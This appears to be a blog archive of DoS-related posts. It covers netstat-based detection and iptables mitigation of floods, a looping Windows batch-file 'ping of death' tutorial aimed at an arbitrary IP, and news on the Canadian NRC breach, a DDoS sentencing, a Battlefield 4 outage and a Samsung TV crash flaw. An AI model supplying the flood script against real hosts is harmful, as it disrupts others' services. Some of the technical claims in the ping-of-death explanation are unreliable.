Archive for the ‘DoS Attack’ Category

Your server appearing pretty slow could be due to many things, from wrong configs, scripts and dodgy hardware, but sometimes it could be because someone is flooding your server with traffic, known as a DoS (Denial of Service) or DDoS (Distributed Denial of Service) attack.

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. These attacks generally target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks are implemented either by forcing the targeted computer to reset, by consuming its resources so that it can no longer provide its services, or by obstructing the communication media between the users and the victim so that they can no longer communicate adequately.

In this small article you’ll see how to check if your server is under attack from the Linux terminal with the netstat command.

From the man page of netstat: “netstat – Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships”.

Some examples with explanation:

netstat -na
This displays all active Internet connections to the server; only established connections are included.

netstat -an | grep :80 | sort
Show only active Internet connections to the server on port 80 (the HTTP port, so this is useful if you run a web server) and sort the results. Useful for detecting a single-source flood, since it lets you recognize many connections coming from one IP.

netstat -n -p | grep SYN_REC | wc -l
This command is useful to find out how many connections in SYN_REC state are currently on the server. The number should be pretty low, preferably less than 5. During DoS attack incidents or mail bombs the number can jump pretty high. However, the value always depends on the system, so a high value here may be average on another server.

netstat -n -p | grep SYN_REC | sort -u
List all the IP addresses involved instead of just a count.

netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
List the IP addresses of the nodes that are sending connections in SYN_REC state (pipe through sort -u to get only the unique ones).

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
Use netstat to count the number of connections each IP address has made to the server.

netstat -anp | grep -E 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
List the number of connections each IP has to the server using the TCP or UDP protocol (grep -E is needed for the | alternation to work).

netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr
Check ESTABLISHED connections only, instead of all connections, and display the connection count for each IP.

netstat -plan | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nk 1
Show the IP addresses that connect to port 80 on the server, each with its connection count. Port 80 is used mainly for HTTP web page requests.

How to mitigate a DoS attack

Once you have found the IPs that are attacking your server you can use the following command to block their connections to your server:

iptables -I INPUT 1 -s $IPADDRESS -j DROP
Please note that you have to replace $IPADDRESS with the IP numbers that you have found with netstat. The rule is inserted at position 1 of the INPUT chain so it is evaluated first; use -j REJECT instead of -j DROP if you prefer the client to get an immediate refusal rather than a timeout.
After firing the above command, KILL all httpd connections to clean your system and then restart the httpd service by
using the following commands:

killall -KILL httpd

service httpd start        # For Red Hat systems
/etc/init.d/apache2 restart   # For Debian systems
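As an added example (not from the original post), the following script ties the detection and mitigation steps above together: it counts connections per remote IP in constructed `netstat -ntu`-style output, skipping the header lines, and prints a DROP rule in the form used above for every IP over a threshold, so an operator can review the rules before applying them. The sample output, the threshold of 3 and the function names are assumptions.

```shell
#!/bin/sh
# Added example: count connections per remote IP from netstat-style output
# and print (not apply) an iptables DROP rule for IPs above a threshold.

# Constructed sample in the layout of `netstat -ntu` (field 5 = foreign address).
SAMPLE_NETSTAT='Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.0.0.5:80             198.51.100.7:51234      SYN_RECV
tcp        0      0 10.0.0.5:80             198.51.100.7:51235      SYN_RECV
tcp        0      0 10.0.0.5:80             198.51.100.7:51236      SYN_RECV
tcp        0      0 10.0.0.5:80             198.51.100.7:51237      ESTABLISHED
tcp        0      0 10.0.0.5:80             203.0.113.9:40001       ESTABLISHED
tcp        0      0 10.0.0.5:22             203.0.113.9:40002       ESTABLISHED
udp        0      0 10.0.0.5:53             192.0.2.33:5353'

# count_per_ip: reads netstat lines on stdin, prints "<count> <ip>" sorted
# descending. Header lines are skipped because field 5 is not "a.b.c.d:port".
count_per_ip() {
    awk '$5 ~ /^[0-9.]+:[0-9]+$/ { split($5, a, ":"); n[a[1]]++ }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

# block_rules: reads "<count> <ip>" lines on stdin and prints one iptables
# rule (inserted at position 1 of INPUT, as in the post) per IP whose count
# exceeds the threshold given as $1.
block_rules() {
    awk -v t="$1" '$1 > t { print "iptables -I INPUT 1 -s " $2 " -j DROP" }'
}

# top_offender: the IP with the most connections, or nothing on empty input.
top_offender() {
    count_per_ip | awk 'NR == 1 { print $2 }'
}

# Show the per-IP counts, then the rules an operator would review before running.
printf '%s\n' "$SAMPLE_NETSTAT" | count_per_ip
printf '%s\n' "$SAMPLE_NETSTAT" | count_per_ip | block_rules 3
```

On a live server, replace the constructed sample with the real output (`netstat -ntu | count_per_ip | block_rules 3`) and run the printed rules only after confirming the IPs are not legitimate clients such as a proxy or load balancer.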

How does a Ping of Death attack work?
Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, the ping packet gets fragmented into smaller groups of packets.

One fragment is 8 octets in size. When these packets reach the target computer, they arrive in fragments, so the target computer reassembles the malformed packets which are received in chunks. But the whole reassembled packet causes a buffer overflow at the target computer.

This buffer overflow often crashes the system, making it more vulnerable to attack.

Once the system becomes more vulnerable to attack, it allows more attacks like the injection of a trojan horse on the target machine.

A simple tutorial on how to perform a DoS attack using ping of death from CMD:

Disclaimer: This is just for educational purposes. It’s nothing great but you can use it to learn.

Here are the steps:

  • Open Notepad
  • Copy the following text on the notepad

:loop
ping <IP Address> -l 65500 -w 1 -n 1
goto :loop

In the above command, replace <IP Address> with an IP address.

  • Save the Notepad with any name. Let’s say dos.txt
  • Right click on the dos.txt and click on rename.
  • Change the extension from .txt to .bat
  • So, now the file name should be dos.bat
  • Double click on it and you will see a command prompt running with a lot of pings.

Government CIO says National Research Council was hit by intrusion from ‘sophisticated’ state-sponsored actor

The Canadian government has said it will take it a year to build a more secure IT infrastructure after the National Research Council (NRC) was hit by a recent cyber attack it’s blaming on Beijing.

In a brief statement, the NRC said that intelligence agency the Communications Security Establishment had recently “detected and confirmed” an intrusion into its infrastructure.

“Following assessments by NRC and its security partners, action has been taken to contain and address this security breach, including protecting its information holdings and notifying the Privacy Commissioner. NRC has also taken steps to inform its clients and stakeholders about this situation,” it added.

“NRC is continuing to work closely with its IT experts and security partners to create a new secure IT infrastructure. This could take approximately one year however; every step is being taken to minimize disruption.”

A separate statement by the Government of Canada CIO went further, claiming the attack was perpetrated by a “highly sophisticated Chinese state-sponsored actor”.

“While the National Research Council’s networks do not currently operate within the broader Government of Canada network, since the detection and confirmation of the cyber intrusion, the National Research Council’s networks have been isolated from the broader Government of Canada network as a precautionary measure,” it added.

“We have no evidence that data compromises have occurred on the broader Government of Canada network.”

China appears to have assumed its typical stance in response to such allegations – outright denial.

Yang Yundong, a Chinese embassy spokesman in Ottawa, emailed Bloomberg to angrily refute what he described as “groundless allegations”.

The question now remains whether, after potentially a whole year, the NRC’s newly fortified security systems will be up to the task of defending against the next generation of advanced attacks no doubt currently being developed by nation states.

Amichai Shulman, CTO of security firm Imperva, argued that any “meaningful change” to IT infrastructure takes time.

“It is quite obvious today that adopting a technology across a large organization takes more time than it takes for the next technology to emerge,” he told Infosecur

“This is the reality and we should embrace it. Organizations find different ways to handle this risk in the general IT domain and particularly in the IT security domain.”

Planning infrastructure changes with “visionary consultants” and installing products from vendors who have capabilities “on top of market requirements” are just two ways to future-proof systems, he added.

“Moreover, by working with vendors who provide holistic solutions rather than niche products and system integrators who provide the integration between products of different domains the organization is better fitted for the unforeseen challenges of the day after deployment ends,” claimed Shulman.

Richard Cassidy, senior solutions architect at Alert Logic, argued that auditing and continual review of “security systems, practices and data” can help organizations stay one step ahead of more advanced threats.
“It is positive that the need to review existing infrastructure and practices has been identified, but more importantly for NRC is in the understanding on why the incident occurred and how they can assure they put in place processes around existing available technologies to continually monitor, review and respond to anomalies, suspicious activity or unauthorized access attempts to critical assets once the new infrastructure is implemented,” he added.

Reported by Infosecurity


24-year-old Jacob Allen Wilkens of Postville, Iowa, has been sentenced to 24 months’ probation for participating in the attack launched by Anonymous against Angel Soft, a subsidiary of Koch Industries. He has also been ordered to pay $110,932.71 (€80,919.64) in restitution. Wilkens has admitted launching distributed denial-of-service (DDoS) attacks against the website of bathroom tissue company Angel Soft in February and March 2011. The web server that hosts the website is located in Green Bay, Wisconsin.
Koch Industries said the attack had caused losses of several hundred thousand dollars. The Iowa man is the third to be sentenced. Back in December 2013, 38-year-old Eric J. Rosol was sentenced to two years’ probation. Earlier this month, 22-year-old Christopher Michael Sudlik of St. Louis, Missouri, was sentenced to three years’ probation and 60 hours of community service.


The famous shooter video game “Battlefield” was hit by a denial-of-service attack; specifically, version 4 for PC was attacked, and as a result the game was unplayable for its users.
Battlefield is a series of first-person shooter video games that started out on Microsoft Windows and OS X with its debut title, Battlefield 1942, which was released in 2002.
The attack was confirmed by the game’s developers in a forum thread. ”We are being targeted by a DDOS, but working on fixing it asap,” said Battlefield producer Ali Hassoon. ”I’m sorry somebody is ruining your and my day. Rest assured we are doing our best to mitigate the situation though.”
Battlefield 4 is not the only one experiencing issues. In a Battlelog update today, DICE laid out plans for how it hopes to improve the game across multiple platforms.
Battlefield 4 launched on October 29 for PC, Xbox 360, and PlayStation 3, before coming to PS4 last week as a launch title. The military FPS will be released this Friday, November 22, for Xbox One.
– See more at: http://hackersnewsbulletin.com

Samsung

A vulnerability in the latest firmware of the network-enabled Samsung TV models allows potential attackers to crash the vulnerable devices with a Denial of Service (DoS) attack, according to security researcher Malik Mesellem.
According to Malik, the web server (DMCRUIS/0.1) installed on the Smart TVs and listening on port TCP/5600 can be crashed, rebooting the device, if an attacker sends a long HTTP GET request to the TV’s IP address.

Malik successfully tested the exploit on his Samsung PS50C7700 plasma TV, as shown in the video below:

In the demo, the TV is connected by Ethernet cable to a home network; after the exploit is run against the TV’s IP address, the TV restarts a few seconds later, and the process can be repeated.
This means that a potential attacker only needs to obtain access to the LAN that the TV has joined in order to attack it. This can be done either by breaking into a wireless access point or by infecting a computer on the same network with malware.
Malik discovered the flaw on July 21st, 2013, published a proof-of-concept exploit on his website, and the vulnerability was assigned CVE-2013-4890. I think we now need firewall or antivirus protection for our television sets too.